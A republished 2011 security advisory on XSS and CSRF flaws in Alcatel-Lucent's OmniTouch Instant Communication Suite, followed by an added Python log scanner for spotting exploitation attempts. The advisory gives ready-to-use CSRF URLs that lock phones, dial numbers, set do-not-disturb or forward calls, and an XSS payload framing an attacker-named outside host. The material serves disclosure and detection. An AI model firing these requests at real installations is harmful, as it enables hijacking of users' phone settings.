OmniTouch Instant Communication Suite XSRF / XSS

Published: 25 Oct 2011 00:00:00. Reported by: Tobias Glemser. Type: packetstorm. Source: packetstormsecurity.com

Multiple vulnerabilities in Alcatel Lucent's OmniTouch Instant Communication Suite (ICS) Version 6.1 Patch 102a: reflected and stored XSS and CSRF in WebICS, and reflected XSS in WebAdmin.

`TC-SA-2011-01: Multiple vulnerabilities in OmniTouch Instant Communication  
Suite  
  
Published: 2011/10/24  
Advisory-Version: 1.0  
  
References:   
- Alcatel Lucent Vulnerability Statement 2011003 Multiple vulnerabilities  
in OmniTouch Instant Communication Suite  
- CVE-2011-4058 - multiple XSS vulnerabilities in Alcatel-Lucent  
OmniTouch 8400 Instant Communication Suite   
- CVE-2011-4059 - multiple CSRF vulnerabilities in Alcatel-Lucent  
OmniTouch 8400 Instant Communication Suite   
- Cert-IST reference number: Cert-IST/AV-2011.583   
- URL of this advisory (used for updates):  
http://www.tele-consulting.com/advisories/TC-SA-2011-01.txt  
  
Affected products:  
Alcatel Lucent OmniTouch 8400 Instant Communications  
Suite (ICS) Version 6.1 Patch 102a  
(older releases have not been tested)  
  
Summary:  
Alcatel Lucent's ICS offers Unified Communication services  
over several access channels, such as handhelds and web clients.  
The web client WebICS offers end users services such as access  
to personal and global address books, call initiation, call  
redirects etc.  
Several common flaws were found in WebICS, including reflected  
and stored XSS as well as CSRF. In WebAdmin, reflected XSS  
was found.  
  
Possible Effects:  
One could use a stored XSS in the phonebook and change the  
end user's phone configuration, such as DND or call redirect.  
  
Vulnerable Scripts WebICS:  
CSRF  
- /websoftphone/servlet/DispPhoneSet  
- /websoftphone/servlet/DispRTC  
- /websoftphone/servlet/DispPhoneSet  
  
stored XSS:  
- all Input-Fields of the phonebook  
  
reflected XSS:  
  
- /websoftphone/jsp/CBCallBackCont.jsp, parameter list  
- /websoftphone/jsp/PhoneBookCont.jsp, parameter udatab  
- /websoftphone/jsp/CustoData.jsp, parameter openwin  
- /websoftphone/jsp/RTCNavigator.jsp, parameter sessionid  
- /websoftphone/servlet/DispLogon, parameter next  
- /websoftphone/servlet/DispLogon, parameter main  
  
  
Vulnerable Scripts WebAdmin:  
reflected XSS:  
- /ClientMgmt/ClientMgmt, parameter action  
  
Examples CSRF:  
- Lock a phone  
https://webics.yourdomain.local/websoftphone/servlet/ \  
DispPhoneSet?method=setLock  
  
- Dial  
https://webics.yourdomain.local/websoftphone/servlet/ \  
DispRTC?method=makeCall&number=XXXX  
  
- Set DND  
https://webics.yourdomain.local/websoftphone/servlet/ \  
DispPhoneSet?method=setDoNotDisturb  
  
- Set call forward  
https://webics.yourdomain.local/websoftphone/servlet/ \  
DispPhoneSet?method=setForward&type=immediate& \  
FwdTarget=onSomeone&number=xxxx  
  
https://webics.yourdomain.local/websoftphone/jsp/ \  
CBCallBackCont.jsp?list=%22%3E%3CFRAME%20SRC=%22 \  
http://www.boeserangreifer.de%22%3E%3C&rand=0  
  
Possible solutions:  
- install the vendor supplied hotfix  
  
Disclosure Timeline:  
2011/02/17 vendor contacted via [email protected]  
2011/02/18 initial vendor response   
2011/06/27 vendor sent an internal advisory to business partners for  
some reflected XSS issues  
2011/07/20 vendor sent an updated internal advisory to business  
partners, including a hotfix for some reflected XSS issues  
2011/09/06 vendor sent an updated internal advisory to business  
partners  
2011/09/26 vendor sent an updated internal advisory to business  
partners addressing all issues  
2011/10/24 coordinated public disclosure  
  
Credits:  
Tobias Glemser ([email protected])  
Tele-Consulting security networking training GmbH, Germany  
www.tele-consulting.com  
  
Disclaimer:  
All information is provided without warranty. The intent is to   
provide information to secure infrastructure and/or systems, not  
to be able to attack or damage. Therefore Tele-Consulting shall   
not be liable for any direct or indirect damages that might be   
caused by using this information.  
  
  
`
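
For operators who want to check web server logs on an unpatched installation, the following is an added example, not part of the advisory or of any vendor tooling. It flags requests to the scripts and parameters listed above when a reflected-XSS parameter carries markup characters or when a state-changing servlet call arrives with a missing or foreign Referer. It assumes Apache "combined" log format and the hostname used in the advisory's examples; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Reflected-XSS parameters named in the advisory: path -> parameters.
XSS_PARAMS = {
    "/websoftphone/jsp/CBCallBackCont.jsp": ("list",),
    "/websoftphone/jsp/PhoneBookCont.jsp": ("udatab",),
    "/websoftphone/jsp/CustoData.jsp": ("openwin",),
    "/websoftphone/jsp/RTCNavigator.jsp": ("sessionid",),
    "/websoftphone/servlet/DispLogon": ("next", "main"),
    "/ClientMgmt/ClientMgmt": ("action",),
}
# Servlets the advisory lists as CSRF-prone.
CSRF_PATHS = ("/websoftphone/servlet/DispPhoneSet", "/websoftphone/servlet/DispRTC")
MARKUP = re.compile(r"[<>\"']")  # characters with no place in these parameters
# Assumption: Apache/NCSA "combined" log format (request, status, size, referer).
LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+" \d{3} \S+ "([^"]*)"')

def classify(line, own_host):
    """Return findings for one access-log line (empty list if clean)."""
    m = LINE.search(line)
    if not m:
        return []
    url, referer = urlsplit(m.group(1)), m.group(2)
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    findings = []
    for name in XSS_PARAMS.get(url.path, ()):
        if any(MARKUP.search(v) for v in params.get(name, [])):
            findings.append(f"xss:{url.path}:{name}")
    # State-changing call whose Referer is absent or from another host.
    if url.path in CSRF_PATHS and "method" in params:
        if urlsplit(referer).hostname != own_host:
            findings.append(f"csrf:{url.path}:{params['method'][0]}")
    return findings

def scan(lines, own_host):
    """Return (line_number, findings) for every line that triggers a rule."""
    hits = ((n, classify(l, own_host)) for n, l in enumerate(lines, 1))
    return [(n, f) for n, f in hits if f]

# Constructed sample log lines (not taken from a real system).
SAMPLE = [
    '10.0.0.5 - - [24/Oct/2011:10:00:00 +0200] "GET /websoftphone/servlet/DispPhoneSet?method=setForward&type=immediate&FwdTarget=onSomeone&number=5550100 HTTP/1.1" 200 512 "http://intranet.example/news.html" "Mozilla/5.0"',
    '10.0.0.6 - - [24/Oct/2011:10:01:00 +0200] "GET /websoftphone/servlet/DispPhoneSet?method=setDoNotDisturb HTTP/1.1" 200 498 "https://webics.yourdomain.local/websoftphone/" "Mozilla/5.0"',
    '10.0.0.7 - - [24/Oct/2011:10:02:00 +0200] "GET /websoftphone/jsp/CBCallBackCont.jsp?list=%22%3E%3Cb%3E&rand=0 HTTP/1.1" 200 733 "-" "Mozilla/5.0"',
    '10.0.0.8 - - [24/Oct/2011:10:03:00 +0200] "GET /websoftphone/jsp/PhoneBookCont.jsp?udatab=3 HTTP/1.1" 200 1201 "https://webics.yourdomain.local/websoftphone/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, f in scan(SAMPLE, "webics.yourdomain.local"):
        print(n, f)
```

The Referer comparison is a heuristic that surfaces candidates for review; parameters sent in a POST body are not visible in access logs.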
